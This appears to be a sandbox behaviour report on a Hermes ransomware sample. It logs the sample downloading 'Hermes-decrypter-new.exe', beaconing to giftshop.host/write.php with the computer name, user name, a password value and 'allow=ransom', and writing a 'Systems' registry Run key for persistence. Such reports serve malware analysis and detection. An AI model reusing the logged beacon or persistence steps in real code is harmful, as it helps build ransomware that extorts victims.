Server Name h139975.s08.test-hf.su
Server Port 80
Username -
Password -
Data Sent 251 bytes
Data Received 10.79 MB
Operation Additional Information Success Count Logfile
Open Session - True 1
Fn
Open Connection protocol = http, server_name = h139975.s08.test-hf.su, server_port = 80 True 1
Fn
Open HTTP Request http_verb = GET, http_version = HTTP/1.1, target_resource = /SmailFile/Hermes-decrypter-new.exe True 1
Fn
Send HTTP Request headers = Host: h139975.s08.test-hf.su, url = h139975.s08.test-hf.su/SmailFile/Hermes-decrypter-new.exe True 1
Fn
Data
Read Response size = 4096, size_out = 4096 True 1
Fn
Data
Read Response size = 65536, size_out = 9712 True 1
Fn
Data
Read Response size = 65536, size_out = 65536 True 1
Fn
Data
Read Response size = 65536, size_out = 24064 True 1
Fn
Data
Read Response size = 65536, size_out = 28000 True 1
Fn
Data
Read Response size = 65536, size_out = 50400 True 1
Fn
Data
Read Response size = 65536, size_out = 5600 True 1
Fn
Data
Read Response size = 65536, size_out = 47600 True 1
Fn
Data
Read Response size = 65536, size_out = 56000 True 1
Fn
Data
Read Response size = 65536, size_out = 44800 True 1
Fn
Data
Read Response size = 65536, size_out = 2800 True 1
Fn
Data
Read Response size = 65536, size_out = 47600 True 1
Fn
Data
Read Response size = 65536, size_out = 5600 True 1
Fn
Data
Read Response size = 65536, size_out = 39200 True 1
Fn
Data
Read Response size = 65536, size_out = 2800 True 1
Fn
Data
Read Response size = 65536, size_out = 42000 True 1
Fn
Data
Read Response size = 65536, size_out = 5600 True 1
Fn
Data
Read Response size = 65536, size_out = 42000 True 1
Fn
Data
Read Response size = 65536, size_out = 2800 True 1
Fn
Data
Read Response size = 65536, size_out = 56000 True 1
Fn
Data
Read Response size = 65536, size_out = 44800 True 1
Fn
Data
Read Response size = 65536, size_out = 47600 True 1
Fn
Data
Read Response size = 65536, size_out = 2800 True 1
Fn
Data
Read Response size = 65536, size_out = 65536 True 1
Fn
Data
Read Response size = 65536, size_out = 10064 True 1
Fn
Data
Read Response size = 65536, size_out = 22400 True 1
Fn
Data
Read Response size = 65536, size_out = 11200 True 1
Fn
Data
Read Response size = 65536, size_out = 33600 True 1
Fn
Data
Read Response size = 65536, size_out = 36400 True 1
Fn
Data
Read Response size = 65536, size_out = 8400 True 1
Fn
Data
Read Response size = 65536, size_out = 2800 True 1
Fn
Data
Read Response size = 65536, size_out = 50400 True 1
Fn
Data
Read Response size = 65536, size_out = 2800 True 1
Fn
Data
Read Response size = 65536, size_out = 44800 True 1
Fn
Data
Read Response size = 65536, size_out = 2800 True 1
Fn
Data
Read Response size = 65536, size_out = 50400 True 1
Fn
Data
Read Response size = 65536, size_out = 47600 True 1
Fn
Data
Read Response size = 65536, size_out = 2800 True 1
Fn
Data
Read Response size = 65536, size_out = 47600 True 2
Fn
Data
Read Response size = 65536, size_out = 22400 True 1
Fn
Data
Read Response size = 65536, size_out = 28000 True 1
Fn
Data
Read Response size = 65536, size_out = 5600 True 1
Fn
Data
Read Response size = 65536, size_out = 47600 True 1
Fn
Data
Read Response size = 65536, size_out = 2800 True 1
Fn
Data
Read Response size = 65536, size_out = 47600 True 1
Fn
Data
Read Response size = 65536, size_out = 2800 True 1
Fn
Data
Read Response size = 65536, size_out = 42000 True 1
Fn
Data
Read Response size = 65536, size_out = 56000 True 1
Fn
Data
Read Response size = 65536, size_out = 2800 True 1
Fn
Data
Read Response size = 65536, size_out = 42000 True 1
Fn
Data
Read Response size = 65536, size_out = 56000 True 1
Fn
Data
Read Response size = 65536, size_out = 8400 True 1
Fn
Data
Read Response size = 65536, size_out = 36400 True 1
Fn
Data
Read Response size = 65536, size_out = 58800 True 1
Fn
Data
Read Response size = 65536, size_out = 5600 True 1
Fn
Data
Read Response size = 65536, size_out = 42000 True 1
Fn
Data
Read Response size = 65536, size_out = 53200 True 1
Fn
Data
Read Response size = 65536, size_out = 5600 True 1
Fn
Data
Read Response size = 65536, size_out = 39200 True 1
Fn
Data
Read Response size = 65536, size_out = 56000 True 1
Fn
Data
Read Response size = 65536, size_out = 30800 True 1
Fn
Data
Read Response size = 65536, size_out = 16800 True 1
Fn
Data
Read Response size = 65536, size_out = 2800 True 1
Fn
Data
Read Response size = 65536, size_out = 58800 True 1
Fn
Data
Read Response size = 65536, size_out = 14000 True 1
Fn
Data
Read Response size = 65536, size_out = 39200 True 1
Fn
Data
Read Response size = 65536, size_out = 14000 True 1
Fn
Data
Read Response size = 65536, size_out = 42000 True 1
Fn
Data
Read Response size = 65536, size_out = 14000 True 1
Fn
Data
Read Response size = 65536, size_out = 39200 True 1
Fn
Data
Read Response size = 65536, size_out = 5600 True 1
Fn
Data
Read Response size = 65536, size_out = 8400 True 1
Fn
Data
Read Response size = 65536, size_out = 42000 True 1
Fn
Data
Read Response size = 65536, size_out = 36400 True 1
Fn
Data
Read Response size = 65536, size_out = 8400 True 1
Fn
Data
Read Response size = 65536, size_out = 25200 True 1
Fn
Data
Read Response size = 65536, size_out = 19600 True 2
Fn
Data
Read Response size = 65536, size_out = 53200 True 1
Fn
Data
Read Response size = 65536, size_out = 36400 True 1
Fn
Data
Read Response size = 65536, size_out = 8400 True 1
Fn
Data
Read Response size = 65536, size_out = 33600 True 1
Fn
Data
Read Response size = 65536, size_out = 47600 True 1
Fn
Data
Read Response size = 65536, size_out = 36400 True 1
Fn
Data
Read Response size = 65536, size_out = 42000 True 1
Fn
Data
Read Response size = 65536, size_out = 5600 True 1
Fn
Data
Read Response size = 65536, size_out = 39200 True 1
Fn
Data
Read Response size = 65536, size_out = 5600 True 1
Fn
Data
Read Response size = 65536, size_out = 65536 True 1
Fn
Data
Read Response size = 65536, size_out = 11464 True 1
Fn
Data
Read Response size = 65536, size_out = 9800 True 1
Fn
Data
Read Response size = 65536, size_out = 22400 True 2
Fn
Data
Read Response size = 65536, size_out = 11200 True 1
Fn
Data
Read Response size = 65536, size_out = 65536 True 1
Fn
Data
Read Response size = 65536, size_out = 5864 True 1
Fn
Data
Read Response size = 65536, size_out = 57400 True 1
Fn
Data
Read Response size = 65536, size_out = 19600 True 1
Fn
Data
Read Response size = 65536, size_out = 53200 True 2
Fn
Data
Read Response size = 65536, size_out = 50400 True 1
Fn
Data
Read Response size = 65536, size_out = 5600 True 1
Fn
Data
Read Response size = 65536, size_out = 47600 True 1
Fn
Data
Read Response size = 65536, size_out = 16800 True 1
Fn
Data
Read Response size = 65536, size_out = 39200 True 1
Fn
Data
Read Response size = 65536, size_out = 19600 True 1
Fn
Data
Read Response size = 65536, size_out = 42000 True 1
Fn
Data
Read Response size = 65536, size_out = 5600 True 1
Fn
Data
Read Response size = 65536, size_out = 56000 True 2
Fn
Data
Read Response size = 65536, size_out = 44800 True 2
Fn
Data
Read Response size = 65536, size_out = 5600 True 1
Fn
Data
Read Response size = 65536, size_out = 39200 True 1
Fn
Data
Read Response size = 65536, size_out = 44800 True 1
Fn
Data
Read Response size = 65536, size_out = 2800 True 1
Fn
Data
Read Response size = 65536, size_out = 44800 True 1
Fn
Data
Read Response size = 65536, size_out = 2800 True 1
Fn
Data
Read Response size = 65536, size_out = 44800 True 1
Fn
Data
Read Response size = 65536, size_out = 47600 True 1
Fn
Data
Read Response size = 65536, size_out = 5600 True 1
Fn
Data
Read Response size = 65536, size_out = 44800 True 1
Fn
Data
Read Response size = 65536, size_out = 53200 True 1
Fn
Data
Read Response size = 65536, size_out = 2800 True 1
Fn
Data
Read Response size = 65536, size_out = 42000 True 1
Fn
Data
Read Response size = 65536, size_out = 2800 True 1
Fn
Data
Read Response size = 65536, size_out = 42000 True 1
Fn
Data
Read Response size = 65536, size_out = 2800 True 1
Fn
Data
Read Response size = 65536, size_out = 42000 True 1
Fn
Data
Read Response size = 65536, size_out = 2800 True 1
Fn
Data
Read Response size = 65536, size_out = 42000 True 1
Fn
Data
Read Response size = 65536, size_out = 2800 True 1
Fn
Data
Read Response size = 65536, size_out = 42000 True 1
Fn
Data
Read Response size = 65536, size_out = 5600 True 1
Fn
Data
Read Response size = 65536, size_out = 39200 True 1
Fn
Data
Read Response size = 65536, size_out = 2800 True 1
Fn
Data
Read Response size = 65536, size_out = 42000 True 1
Fn
Data
Read Response size = 65536, size_out = 47600 True 1
Fn
Data
Read Response size = 65536, size_out = 2800 True 1
Fn
Data
Read Response size = 65536, size_out = 47600 True 1
Fn
Data
Read Response size = 65536, size_out = 2800 True 1
Fn
Data
Read Response size = 65536, size_out = 47600 True 1
Fn
Data
Read Response size = 65536, size_out = 53200 True 1
Fn
Data
Read Response size = 65536, size_out = 2800 True 1
Fn
Data
Read Response size = 65536, size_out = 47600 True 1
Fn
Data
Read Response size = 65536, size_out = 8400 True 1
Fn
Data
Read Response size = 65536, size_out = 44800 True 1
Fn
Data
Read Response size = 65536, size_out = 11200 True 1
Fn
Data
Read Response size = 65536, size_out = 33600 True 1
Fn
Data
Read Response size = 65536, size_out = 2800 True 1
Fn
Data
Read Response size = 65536, size_out = 47600 True 2
Fn
Data
For performance reasons, the remaining 42 entries are omitted.
The remaining entries can be found in glog.xml.
HTTP Session #4
»
Information Value
Server Name giftshop.host
Server Port 80
Username -
Password -
Data Sent 147 bytes
Data Received 229 bytes
Operation Additional Information Success Count Logfile
Open Session - True 1
Fn
Open Connection protocol = http, server_name = giftshop.host, server_port = 80 True 1
Fn
Open HTTP Request http_verb = GET, http_version = HTTP/1.1, target_resource = /write.php?computer_name=NQDPDE&userName=FD1HVy&password=lV5MTdp=(I8f9TR&allow=ransom True 1
Fn
Send HTTP Request headers = Host: giftshop.host, Connection: Keep-Alive, url = giftshop.host/write.php?computer_name=NQDPDE&userName=FD1HVy&password=lV5MTdp=(I8f9TR&allow=ransom True 1
Fn
Data
Read Response size = 4096, size_out = 229 True 1
Fn
Data
Close Session - True 1
Fn
Process #3: hermes-decrypter-new.exe
2299 0
»
Information Value
ID #3
File Name c:\fd1hvy\hermes-decrypter-new.exe
Command Line "C:\FD1HVy\Hermes-decrypter-new.exe"
Initial Working Directory C:\Users\FD1HVy\Desktop\
Monitor Start Time: 00:02:16, Reason: Child Process
Unmonitor End Time: 00:02:59, Reason: Self Terminated
Monitor Duration 00:00:43
OS Process Information
»
Information Value
PID 0xc14
Parent PID 0xf4c (c:\users\fd1hvy\desktop\hermes.exe)
Bitness 32-bit
Is Created or Modified Executable True
Integrity Level High (Elevated)
Username NQDPDE\FD1HVy
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x 390
0x C70
0x E40
0x 42C
0x 6C8
0x 174
0x D6C
0x F50
Host Behavior
File (27)
»
Operation Filename Additional Information Success Count Logfile
Create C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
Fn
Get Info C:\Windows\Microsoft.NET\Framework\v4.0.30319\clrjit.dll type = file_attributes True 1
Fn
Get Info C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config type = file_attributes True 2
Fn
Get Info C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config type = file_type True 2
Fn
Get Info C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config type = size, size_out = 0 True 1
Fn
Get Info C:\FD1HVy\Hermes-decrypter-new.exe.config type = file_attributes False 3
Fn
Open \??\C:\FD1HVy\Hermes-decrypter-new.exe desired_access = FILE_READ_ATTRIBUTES, SYNCHRONIZE, GENERIC_READ, open_options = FILE_SYNCHRONOUS_IO_NONALERT, FILE_NON_DIRECTORY_FILE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Open STD_INPUT_HANDLE - True 2
Fn
Open STD_OUTPUT_HANDLE - True 2
Fn
Open STD_ERROR_HANDLE - True 2
Fn
Read C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config size = 4096, size_out = 4096 True 8
Fn
Data
Read C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config size = 4096, size_out = 3215 True 1
Fn
Data
Read C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config size = 4096, size_out = 0 True 1
Fn
Registry (17)
»
Operation Key Additional Information Success Count Logfile
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\AppContext - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\W. Europe Standard Time - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\W. Europe Standard Time\Dynamic DST - False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework value_name = DbgJITDebugLaunchSetting, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework value_name = DbgManagedDebugger, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run value_name = Systems, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\W. Europe Standard Time value_name = TZI, type = REG_BINARY True 2
Fn
Data
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\W. Europe Standard Time value_name = MUI_Display, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\W. Europe Standard Time value_name = MUI_Display, data = @tzres.dll,-320, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\W. Europe Standard Time value_name = MUI_Std, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\W. Europe Standard Time value_name = MUI_Std, data = @tzres.dll,-322, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\W. Europe Standard Time value_name = MUI_Dlt, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\W. Europe Standard Time value_name = MUI_Dlt, data = @tzres.dll,-321, type = REG_SZ True 1
Fn
Write Value HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run value_name = Systems, data = C:\FD1HVy\Hermes-decrypter-new.exe, size = 70, type = REG_SZ True 1
Fn
Module (1101)
»
Operation Module Additional Information Success Count Logfile
Load mscoree.dll base_address = 0x744c0000 True 1
Fn
Load mscorjit.dll base_address = 0x0 False 1
Fn
Load comctl32.dll base_address = 0x6ff00000 True 1
Fn
Load comctl32.dll base_address = 0x6fcf0000 True 1
Fn
Load C:\WINDOWS\system32\en-US\tzres.dll.mui base_address = 0x85f0001 True 3
Fn
Get Handle c:\windows\syswow64\kernel32.dll base_address = 0x75e90000 True 26
Fn
Get Handle c:\windows\syswow64\ntdll.dll base_address = 0x77bb0000 True 16
Fn
Get Handle c:\windows\syswow64\ole32.dll base_address = 0x77920000 True 1
Fn
Get Handle c:\windows\syswow64\oleaut32.dll base_address = 0x75bb0000 True 1
Fn
Get Handle c:\windows\syswow64\wtsapi32.dll base_address = 0x742b0000 True 1
Fn
Get Handle c:\windows\syswow64\user32.dll base_address = 0x74b70000 True 2
Fn
Get Handle c:\windows\syswow64\kernelbase.dll base_address = 0x74ea0000 True 1
Fn
Get Handle c:\fd1hvy\hermes-decrypter-new.exe base_address = 0x400000 True 102
Fn
Get Handle comctl32.dll base_address = 0x0 False 2
Fn
Get Handle c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.15063.413_none_55bc94a37c2a2854\comctl32.dll base_address = 0x6ff00000 True 182
Fn
Get Handle c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.15063.483_none_6dad63fefc436da8\comctl32.dll base_address = 0x6fcf0000 True 638
Fn
Get Filename - process_name = c:\fd1hvy\hermes-decrypter-new.exe, file_name_orig = C:\FD1HVy\Hermes-decrypter-new.exe, size = 254 True 1
Fn
Get Filename - process_name = c:\fd1hvy\hermes-decrypter-new.exe, file_name_orig = C:\FD1HVy\Hermes-decrypter-new.exe, size = 260 True 2
Fn
Get Filename c:\fd1hvy\hermes-decrypter-new.exe process_name = c:\fd1hvy\hermes-decrypter-new.exe, file_name_orig = C:\FD1HVy\Hermes-decrypter-new.exe, size = 2048 True 2
Fn
Get Filename c:\windows\syswow64\ntdll.dll process_name = c:\fd1hvy\hermes-decrypter-new.exe, file_name_orig = C:\WINDOWS\SYSTEM32\ntdll.dll, size = 2048 True 1
Fn
Get Filename c:\windows\syswow64\kernel32.dll process_name = c:\fd1hvy\hermes-decrypter-new.exe, file_name_orig = C:\WINDOWS\System32\KERNEL32.DLL, size = 2048 True 1
Fn
Get Filename c:\windows\syswow64\kernelbase.dll process_name = c:\fd1hvy\hermes-decrypter-new.exe, file_name_orig = C:\WINDOWS\System32\KERNELBASE.dll, size = 2048 True 1
Fn
Get Filename - process_name = c:\fd1hvy\hermes-decrypter-new.exe, file_name_orig = C:\WINDOWS\SYSTEM32\apphelp.dll, size = 2048 True 1
Fn
Get Filename c:\windows\syswow64\ole32.dll process_name = c:\fd1hvy\hermes-decrypter-new.exe, file_name_orig = C:\WINDOWS\System32\ole32.dll, size = 2048 True 1
Fn
Get Filename - process_name = c:\fd1hvy\hermes-decrypter-new.exe, file_name_orig = C:\WINDOWS\System32\combase.dll, size = 2048 True 1
Fn
Get Filename - process_name = c:\fd1hvy\hermes-decrypter-new.exe, file_name_orig = C:\WINDOWS\System32\ucrtbase.dll, size = 2048 True 1
Fn
Get Filename - process_name = c:\fd1hvy\hermes-decrypter-new.exe, file_name_orig = C:\WINDOWS\System32\RPCRT4.dll, size = 2048 True 1
Fn
Get Filename - process_name = c:\fd1hvy\hermes-decrypter-new.exe, file_name_orig = C:\WINDOWS\System32\SspiCli.dll, size = 2048 True 1
Fn
Get Filename - process_name = c:\fd1hvy\hermes-decrypter-new.exe, file_name_orig = C:\WINDOWS\System32\CRYPTBASE.dll, size = 2048 True 1
Fn
Get Filename - process_name = c:\fd1hvy\hermes-decrypter-new.exe, file_name_orig = C:\WINDOWS\System32\bcryptPrimitives.dll, size = 2048 True 1
Fn
Get Filename - process_name = c:\fd1hvy\hermes-decrypter-new.exe, file_name_orig = C:\WINDOWS\System32\sechost.dll, size = 2048 True 1
Fn
Get Filename - process_name = c:\fd1hvy\hermes-decrypter-new.exe, file_name_orig = C:\WINDOWS\System32\GDI32.dll, size = 2048 True 1
Fn
Get Filename - process_name = c:\fd1hvy\hermes-decrypter-new.exe, file_name_orig = C:\WINDOWS\System32\gdi32full.dll, size = 2048 True 1
Fn
Get Filename - process_name = c:\fd1hvy\hermes-decrypter-new.exe, file_name_orig = C:\WINDOWS\System32\msvcp_win.dll, size = 2048 True 1
Fn
Get Filename c:\windows\syswow64\user32.dll process_name = c:\fd1hvy\hermes-decrypter-new.exe, file_name_orig = C:\WINDOWS\System32\USER32.dll, size = 2048 True 1
Fn
Get Filename - process_name = c:\fd1hvy\hermes-decrypter-new.exe, file_name_orig = C:\WINDOWS\System32\win32u.dll, size = 2048 True 1
Fn
Get Filename c:\windows\syswow64\oleaut32.dll process_name = c:\fd1hvy\hermes-decrypter-new.exe, file_name_orig = C:\WINDOWS\System32\OLEAUT32.dll, size = 2048 True 1
Fn
Get Filename c:\windows\syswow64\wtsapi32.dll process_name = c:\fd1hvy\hermes-decrypter-new.exe, file_name_orig = C:\WINDOWS\SYSTEM32\WTSAPI32.dll, size = 2048 True 1
Fn
Get Filename - process_name = c:\fd1hvy\hermes-decrypter-new.exe, file_name_orig = C:\WINDOWS\System32\msvcrt.dll, size = 2048 True 1
Fn
Get Filename - process_name = c:\fd1hvy\hermes-decrypter-new.exe, file_name_orig = C:\WINDOWS\System32\IMM32.DLL, size = 2048 True 1
Fn
Get Filename - process_name = c:\fd1hvy\hermes-decrypter-new.exe, file_name_orig = C:\WINDOWS\System32\kernel.appcore.dll, size = 2048 True 1
Fn
Get Filename - process_name = c:\fd1hvy\hermes-decrypter-new.exe, file_name_orig = C:\WINDOWS\system32\uxtheme.dll, size = 2048 True 1
Fn
Get Filename c:\windows\syswow64\mscoree.dll process_name = c:\fd1hvy\hermes-decrypter-new.exe, file_name_orig = C:\WINDOWS\SYSTEM32\mscoree.dll, size = 2048 True 1
Fn
Get Filename - process_name = c:\fd1hvy\hermes-decrypter-new.exe, file_name_orig = C:\WINDOWS\System32\ADVAPI32.dll, size = 2048 True 1
Fn
Get Filename - process_name = c:\fd1hvy\hermes-decrypter-new.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll, size = 2048 True 1
Fn
Get Filename - process_name = c:\fd1hvy\hermes-decrypter-new.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll, size = 2048 True 1
Fn
Get Filename - process_name = c:\fd1hvy\hermes-decrypter-new.exe, file_name_orig = C:\WINDOWS\System32\SHLWAPI.dll, size = 2048 True 1
Fn
Get Filename - process_name = c:\fd1hvy\hermes-decrypter-new.exe, file_name_orig = C:\WINDOWS\SYSTEM32\MSVCR120_CLR0400.dll, size = 2048 True 1
Fn
Get Filename - process_name = c:\fd1hvy\hermes-decrypter-new.exe, file_name_orig = C:\WINDOWS\assembly\NativeImages_v4.0.30319_32\mscorlib\f12799647dc4f4abd2f0f17790337f04\mscorlib.ni.dll, size = 2048 True 1
Fn
Get Filename - process_name = c:\fd1hvy\hermes-decrypter-new.exe, file_name_orig = C:\WINDOWS\SYSTEM32\CRYPTSP.dll, size = 2048 True 1
Fn
Get Filename - process_name = c:\fd1hvy\hermes-decrypter-new.exe, file_name_orig = C:\WINDOWS\system32\rsaenh.dll, size = 2048 True 1
Fn
Get Filename - process_name = c:\fd1hvy\hermes-decrypter-new.exe, file_name_orig = C:\WINDOWS\SYSTEM32\bcrypt.dll, size = 2048 True 1
Fn
Get Filename - process_name = c:\fd1hvy\hermes-decrypter-new.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v4.0.30319\clrjit.dll, size = 2048 True 1
Fn
Get Filename - process_name = c:\fd1hvy\hermes-decrypter-new.exe, file_name_orig = C:\WINDOWS\assembly\NativeImages_v4.0.30319_32\System\fcfb8bac8ea9a0e69d72c350b22f8e3f\System.ni.dll, size = 2048 True 1
Fn
Get Filename - process_name = c:\fd1hvy\hermes-decrypter-new.exe, file_name_orig = C:\WINDOWS\assembly\NativeImages_v4.0.30319_32\System.Drawing\5b307e2b9719b21749a8c73127ab5f45\System.Drawing.ni.dll, size = 2048 True 1
Fn
Get Filename - process_name = c:\fd1hvy\hermes-decrypter-new.exe, file_name_orig = C:\WINDOWS\assembly\NativeImages_v4.0.30319_32\System.Windows.Forms\02d3b6022cc1ee466eb660dedcff59aa\System.Windows.Forms.ni.dll, size = 2048 True 1
Fn
Get Filename - process_name = c:\fd1hvy\hermes-decrypter-new.exe, file_name_orig = C:\WINDOWS\System32\psapi.dll, size = 2048 True 1
Fn
Get Filename c:\fd1hvy\hermes-decrypter-new.exe file_name_orig = C:\FD1HVy\Hermes-decrypter-new.exe, size = 2048 True 1
Fn
Get Filename c:\windows\syswow64\ntdll.dll file_name_orig = C:\WINDOWS\SYSTEM32\ntdll.dll, size = 2048 True 1
Fn
Get Filename c:\windows\syswow64\kernel32.dll file_name_orig = C:\WINDOWS\System32\KERNEL32.DLL, size = 2048 True 1
Fn
Get Filename c:\windows\syswow64\kernelbase.dll file_name_orig = C:\WINDOWS\System32\KERNELBASE.dll, size = 2048 True 1
Fn
Get Filename - file_name_orig = C:\WINDOWS\SYSTEM32\apphelp.dll, size = 2048 True 1
Fn
Get Filename c:\windows\syswow64\ole32.dll file_name_orig = C:\WINDOWS\System32\ole32.dll, size = 2048 True 1
Fn
Get Filename - file_name_orig = C:\WINDOWS\System32\combase.dll, size = 2048 True 1
Fn
Get Filename - file_name_orig = C:\WINDOWS\System32\ucrtbase.dll, size = 2048 True 1
Fn
Get Filename - file_name_orig = C:\WINDOWS\System32\RPCRT4.dll, size = 2048 True 1
Fn
Get Filename - file_name_orig = C:\WINDOWS\System32\SspiCli.dll, size = 2048 True 1
Fn
Get Filename - file_name_orig = C:\WINDOWS\System32\CRYPTBASE.dll, size = 2048 True 1
Fn
Get Filename - file_name_orig = C:\WINDOWS\System32\bcryptPrimitives.dll, size = 2048 True 1
Fn
Get Filename - file_name_orig = C:\WINDOWS\System32\sechost.dll, size = 2048 True 1
Fn
Get Filename - file_name_orig = C:\WINDOWS\System32\GDI32.dll, size = 2048 True 1
Fn
Get Filename - file_name_orig = C:\WINDOWS\System32\gdi32full.dll, size = 2048 True 1
Fn
Get Filename - file_name_orig = C:\WINDOWS\System32\msvcp_win.dll, size = 2048 True 1
Fn
Get Filename c:\windows\syswow64\user32.dll file_name_orig = C:\WINDOWS\System32\USER32.dll, size = 2048 True 1
Fn
Get Filename - file_name_orig = C:\WINDOWS\System32\win32u.dll, size = 2048 True 1
Fn
Get Filename c:\windows\syswow64\oleaut32.dll file_name_orig = C:\WINDOWS\System32\OLEAUT32.dll, size = 2048 True 1
Fn
Get Filename c:\windows\syswow64\wtsapi32.dll file_name_orig = C:\WINDOWS\SYSTEM32\WTSAPI32.dll, size = 2048 True 1
Fn
Get Filename - file_name_orig = C:\WINDOWS\System32\msvcrt.dll, size = 2048 True 1
Fn
Get Filename - file_name_orig = C:\WINDOWS\System32\IMM32.DLL, size = 2048 True 1
Fn
Get Filename - file_name_orig = C:\WINDOWS\System32\kernel.appcore.dll, size = 2048 True 1
Fn
Get Filename - file_name_orig = C:\WINDOWS\system32\uxtheme.dll, size = 2048 True 1
Fn
Get Filename c:\windows\syswow64\mscoree.dll file_name_orig = C:\WINDOWS\SYSTEM32\mscoree.dll, size = 2048 True 1
Fn
Get Filename - file_name_orig = C:\WINDOWS\System32\ADVAPI32.dll, size = 2048 True 1
Fn
Get Filename - file_name_orig = C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll, size = 2048 True 1
Fn
Get Filename - file_name_orig = C:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll, size = 2048 True 1
Fn
Get Filename - file_name_orig = C:\WINDOWS\System32\SHLWAPI.dll, size = 2048 True 1
Fn
Get Filename - file_name_orig = C:\WINDOWS\SYSTEM32\MSVCR120_CLR0400.dll, size = 2048 True 1
Fn
Get Filename - file_name_orig = C:\WINDOWS\assembly\NativeImages_v4.0.30319_32\mscorlib\f12799647dc4f4abd2f0f17790337f04\mscorlib.ni.dll, size = 2048 True 1
Fn
Get Filename - file_name_orig = C:\WINDOWS\SYSTEM32\CRYPTSP.dll, size = 2048 True 1
Fn
Get Filename - file_name_orig = C:\WINDOWS\system32\rsaenh.dll, size = 2048 True 1
Fn
Get Filename - file_name_orig = C:\WINDOWS\SYSTEM32\bcrypt.dll, size = 2048 True 1
Fn
Get Filename c:\windows\microsoft.net\framework\v4.0.30319\clrjit.dll file_name_orig = C:\Windows\Microsoft.NET\Framework\v4.0.30319\clrjit.dll, size = 2048 True 1
Fn
Get Filename - file_name_orig = C:\WINDOWS\assembly\NativeImages_v4.0.30319_32\System\fcfb8bac8ea9a0e69d72c350b22f8e3f\System.ni.dll, size = 2048 True 1
Fn
Get Filename - file_name_orig = C:\WINDOWS\assembly\NativeImages_v4.0.30319_32\System.Drawing\5b307e2b9719b21749a8c73127ab5f45\System.Drawing.ni.dll, size = 2048 True 1
Fn
Get Filename - file_name_orig = C:\WINDOWS\assembly\NativeImages_v4.0.30319_32\System.Windows.Forms\02d3b6022cc1ee466eb660dedcff59aa\System.Windows.Forms.ni.dll, size = 2048 True 1
Fn
Get Filename - file_name_orig = C:\WINDOWS\System32\psapi.dll, size = 2048 True 1
Fn
Get Filename - file_name_orig = C:\WINDOWS\SYSTEM32\version.dll, size = 2048 True 1
Fn
Get Filename mscorjit.dll process_name = c:\fd1hvy\hermes-decrypter-new.exe, file_name_orig = C:\FD1HVy\Hermes-decrypter-new.exe, size = 260 True 2
Fn
Get Filename comctl32.dll process_name = c:\fd1hvy\hermes-decrypter-new.exe, file_name_orig = C:\FD1HVy\Hermes-decrypter-new.exe, size = 260 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsAlloc, address_out = 0x75ea4ae0 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsGetValue, address_out = 0x75ea4b20 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsSetValue, address_out = 0x75ea4b40 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsFree, address_out = 0x75ea4b00 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EncodePointer, address_out = 0x77c129e0 True 16
Fn
Get Address c:\windows\syswow64\kernel32.dll function = DecodePointer, address_out = 0x77c11ec0 True 6
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsProcessorFeaturePresent, address_out = 0x75ea5960 True 1
Fn
Get Address c:\windows\syswow64\mscoree.dll function = CLRCreateInstance, address_out = 0x744d5000 True 1
Fn
Get Address c:\windows\microsoft.net\framework\v4.0.30319\clrjit.dll function = getJit, address_out = 0x72803d60 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = DefWindowProcW, address_out = 0x74600140 True 1
Fn
